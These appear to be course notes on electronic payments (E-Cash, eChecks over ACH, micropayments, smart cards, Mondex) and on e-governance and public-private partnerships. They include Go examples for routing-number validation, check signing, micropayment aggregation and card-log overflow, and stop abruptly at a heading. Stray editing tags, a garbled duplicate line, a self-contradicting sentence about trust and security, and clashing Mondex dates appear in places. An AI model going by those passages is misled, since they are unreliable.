While making the payment, it is very important that the internet connection and power supply remain active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it won't reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers’ paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don’t come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn’t accept paper checks, offering eChecks expands your customers’ options and can increase sales. If you’re converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business—and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They’re used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they’re a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here’s how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2. The merchant’s sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account’s checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns an approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House system (ACH). Funds are deposited in approximately 1–3 business days.
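Steps 1 and 4 of the flow above validate the routing number, and the authentication and duplicate-detection features described earlier rest on a digital signature and a record of checks already accepted. The following Go program is an added example, not CyberSource or any processor's code: it checks the ABA routing checksum, signs and verifies a constructed eCheck record with Ed25519 (the record layout, field names and sample values are assumptions), and rejects a re-submitted or tampered check.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// ECheck is a constructed, minimal electronic check record. The field set is
// an assumption for this example; real ACH/eCheck formats carry more fields.
type ECheck struct {
	CheckID    string // unique per check; used for duplicate detection
	Routing    string // 9-digit ABA routing number
	Account    string // payer account number
	AmountCent int64  // amount in cents (integers avoid float rounding)
	Payee      string
}

// ValidABARouting applies the ABA routing number checksum: the nine digits
// are weighted 3,7,1,3,7,1,3,7,1 and the weighted sum must be divisible by 10.
func ValidABARouting(r string) bool {
	if len(r) != 9 {
		return false
	}
	weights := [9]int{3, 7, 1, 3, 7, 1, 3, 7, 1}
	sum := 0
	for i, c := range r {
		if c < '0' || c > '9' {
			return false
		}
		sum += int(c-'0') * weights[i]
	}
	return sum%10 == 0
}

// canonical returns the bytes that are signed. A fixed, unambiguous encoding
// matters: if merchant and processor serialised the check differently, the
// signature would fail to verify even on untampered data.
func (c ECheck) canonical() []byte {
	return []byte(fmt.Sprintf("%s|%s|%s|%d|%s",
		c.CheckID, c.Routing, c.Account, c.AmountCent, c.Payee))
}

// Sign produces the payer-side digital signature with the private key.
func Sign(priv ed25519.PrivateKey, c ECheck) []byte {
	return ed25519.Sign(priv, c.canonical())
}

// Verify is what the receiver does with the payer's public key: it shows the
// check was signed by the key holder and was not altered in transit.
func Verify(pub ed25519.PublicKey, c ECheck, sig []byte) bool {
	return ed25519.Verify(pub, c.canonical(), sig)
}

// DuplicateDetector remembers a fingerprint of every accepted check so that a
// re-submitted scan (same content) is rejected instead of being debited twice.
type DuplicateDetector struct{ seen map[string]bool }

func NewDuplicateDetector() *DuplicateDetector {
	return &DuplicateDetector{seen: map[string]bool{}}
}

// Accept validates routing checksum, signature and uniqueness, in that order.
func (d *DuplicateDetector) Accept(pub ed25519.PublicKey, c ECheck, sig []byte) error {
	if !ValidABARouting(c.Routing) {
		return errors.New("invalid routing number checksum")
	}
	if !Verify(pub, c, sig) {
		return errors.New("signature does not verify")
	}
	fp := sha256.Sum256(c.canonical())
	key := hex.EncodeToString(fp[:])
	if d.seen[key] {
		return errors.New("duplicate check")
	}
	d.seen[key] = true
	return nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	// Constructed sample values; the routing number is a real-format example
	// used only because it satisfies the checksum.
	chk := ECheck{CheckID: "CHK-0001", Routing: "021000021",
		Account: "000123456789", AmountCent: 12550, Payee: "Example Merchant"}
	sig := Sign(priv, chk)
	det := NewDuplicateDetector()
	fmt.Println("first submission:", det.Accept(pub, chk, sig))  // <nil>
	fmt.Println("second submission:", det.Accept(pub, chk, sig)) // duplicate check
	chk.AmountCent = 99999                                       // tampered amount
	fmt.Println("tampered:", det.Accept(pub, chk, sig))         // signature does not verify
}
```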

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)

PayWord (post-payment)


MICROPAYMENT IS –

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

Alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here’s one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
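As an added illustration of the third-party scheme just described (not any provider's code; the wallet, seller and fee values are constructed), this Go program keeps the user's wallet on the provider's side, accumulates per-seller micropayments in hundredths of a cent so fraction-of-a-cent prices stay exact, and pays each seller out in one larger settlement once a threshold is reached.

```go
package main

import (
	"errors"
	"fmt"
)

// Aggregator models the third-party service provider: it holds each user's
// wallet balance, accumulates per-seller micropayments and pays each seller
// out in one larger settlement. Names and thresholds are assumptions.
type Aggregator struct {
	wallets   map[string]int64 // user -> prepaid balance, in hundredths of a cent
	owed      map[string]int64 // seller -> accumulated, not yet settled
	threshold int64            // settle a seller once this much has accumulated
	feeBasis  int64            // provider fee in basis points, taken at settlement
	ledger    []string         // append-only record of every event
}

// NewAggregator works in hundredths of a cent: integers keep fraction-of-a-cent
// prices exact, where floating point would drift over millions of events.
func NewAggregator(thresholdUnits, feeBasisPoints int64) *Aggregator {
	return &Aggregator{
		wallets:   map[string]int64{},
		owed:      map[string]int64{},
		threshold: thresholdUnits,
		feeBasis:  feeBasisPoints,
	}
}

// Fund credits a user's wallet, e.g. after one ordinary card payment.
func (a *Aggregator) Fund(user string, units int64) {
	a.wallets[user] += units
	a.ledger = append(a.ledger, fmt.Sprintf("fund %s %d", user, units))
}

// Pay records one per-fee link being used. It is refused if the wallet cannot
// cover it; the seller never sees the user's funding instrument.
func (a *Aggregator) Pay(user, seller string, units int64) error {
	if units <= 0 {
		return errors.New("amount must be positive")
	}
	if a.wallets[user] < units {
		return errors.New("insufficient wallet balance")
	}
	a.wallets[user] -= units
	a.owed[seller] += units
	a.ledger = append(a.ledger, fmt.Sprintf("pay %s->%s %d", user, seller, units))
	return nil
}

// Settle pays out every seller whose accumulated total reached the threshold
// and returns the net amounts sent (seller -> units after the provider fee).
func (a *Aggregator) Settle() map[string]int64 {
	paid := map[string]int64{}
	for seller, total := range a.owed {
		if total < a.threshold {
			continue
		}
		fee := total * a.feeBasis / 10000
		paid[seller] = total - fee
		a.owed[seller] = 0
		a.ledger = append(a.ledger, fmt.Sprintf("settle %s %d fee %d", seller, total-fee, fee))
	}
	return paid
}

// Outstanding reports what a seller is owed but has not yet been paid.
func (a *Aggregator) Outstanding(seller string) int64 { return a.owed[seller] }

// Balance reports a user's remaining wallet value.
func (a *Aggregator) Balance(user string) int64 { return a.wallets[user] }

func main() {
	// Constructed scenario: a $5 top-up, then 400 quarter-cent article reads
	// at one site and a single half-cent read at another.
	a := NewAggregator(10000, 250) // settle at $1.00 accumulated; 2.5% fee
	a.Fund("alice", 50000)         // $5.00 = 500 cents = 50,000 units
	for i := 0; i < 400; i++ {
		_ = a.Pay("alice", "news-site", 25) // 0.25 cent per page
	}
	_ = a.Pay("alice", "tiny-blog", 50)
	fmt.Println(a.Settle())                 // map[news-site:9750]
	fmt.Println(a.Outstanding("tiny-blog")) // 50, still below threshold
	fmt.Println(a.Balance("alice"))         // 39950
}
```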

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayments are speed and flexibility. From the merchants’ side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than trust is security. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay – Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay – Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay – Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card – Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and MasterCard SecureCode™).

Direct debit – Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users’ PayPal accounts and allows transactions of less than US$12 to take place. As of 2013 the service is offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene, or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing [2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with microchip embedded on it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32000 bytes

Newer smart cards have math co-processors


Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –


Why Smart Cards? –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and “lock card” functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, at the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information

o limits for using disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card’s microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren’t truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can’t purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you’re protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to Mondex, the smart card system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can’t claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
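To make the overflow concrete, here is an added Go model (not Mondex or MasterCard code; the card layout, log size and amounts are assumptions, the log size taken from the rolling 10-transaction record mentioned above): two cards transfer value offline, the payer keeps only the last 10 entries, and an upload to the bank reports how many entries were overwritten before the bank ever saw them.

```go
package main

import (
	"errors"
	"fmt"
)

// Entry is one on-card transaction record. The field choice is an assumption;
// the text only says time, date, amount and participants are logged.
type Entry struct {
	Seq          int    // monotonically increasing per card
	Counterparty string // other card ID or retailer name
	AmountCent   int64  // negative = paid out, positive = received
}

// Card models a stored-value card: value lives on the card and only the last
// logSize transactions are kept. Older entries are overwritten, which is the
// audit gap the critics describe.
type Card struct {
	ID          string
	Balance     int64
	log         []Entry
	logSize     int
	seq         int
	lostEntries int // entries overwritten before any upload to the bank
	uploaded    int // highest Seq the bank has received so far
}

func NewCard(id string, logSize int) *Card {
	return &Card{ID: id, logSize: logSize}
}

// record appends an entry, evicting the oldest when the rolling log is full.
func (c *Card) record(counterparty string, amount int64) {
	c.seq++
	if len(c.log) == c.logSize {
		oldest := c.log[0]
		if oldest.Seq > c.uploaded { // evicted before the bank ever saw it
			c.lostEntries++
		}
		c.log = c.log[1:]
	}
	c.log = append(c.log, Entry{Seq: c.seq, Counterparty: counterparty, AmountCent: amount})
	c.Balance += amount
}

// Load is an online load from a bank account onto the card.
func (c *Card) Load(amount int64) { c.record("bank-load", amount) }

// Transfer moves value card-to-card offline: no bank is contacted, so the only
// protections are the card's own balance check and its log.
func Transfer(from, to *Card, amount int64) error {
	if amount <= 0 {
		return errors.New("amount must be positive")
	}
	if from.Balance < amount {
		return errors.New("insufficient value on card")
	}
	from.record(to.ID, -amount)
	to.record(from.ID, amount)
	return nil
}

// Upload is what happens at an ATM or retailer sync: the bank receives the
// entries still on the card. It returns them and how many entries were lost
// to overflow since the previous upload.
func (c *Card) Upload() (entries []Entry, lost int) {
	entries = append([]Entry(nil), c.log...)
	for _, e := range entries {
		if e.Seq > c.uploaded {
			c.uploaded = e.Seq
		}
	}
	lost = c.lostEntries
	c.lostEntries = 0
	return entries, lost
}

func main() {
	// Constructed scenario: a card loaded with $50 makes 15 offline payments of
	// $1 before it next touches a bank terminal.
	payer := NewCard("card-A", 10)
	payer.Load(5000)
	payer.Upload() // the bank already knows about the load
	shop := NewCard("retailer-1", 10)
	for i := 0; i < 15; i++ {
		_ = Transfer(payer, shop, 100)
	}
	entries, lost := payer.Upload()
	fmt.Printf("balance %d, bank received %d entries, %d lost to overflow\n",
		payer.Balance, len(entries), lost) // balance 3500, 10 entries, 5 lost
}
```

Uploading more often than every 10 transactions (the second case in the test) closes the gap, which is the operational mitigation the overflow argument points to.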

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes its electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term ‘e-Governance’ has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term ‘e-government’ is also used instead of ‘e-Governance’.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word “electronic” in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a congruent definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens’ economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one’s home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) – Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) – Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private

– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –
</gr_replreplace>
<gr_replace lines="32103" cat="reformat" orig="Although each is unique">
Although each is unique, all P3s include four basic characteristics:

Four Basic Dimensions of P3

Although each is unique all P3rsquos include four basic characteristics

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What’s the need?

What’s driving the need? Rationale:

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand public and stakeholder

feedback and economics

Master Schedule/Budget

Political Climate

Any potential “fatal flaws” that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What’s the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN’s e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and is thus a leading indicator of countries’ readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

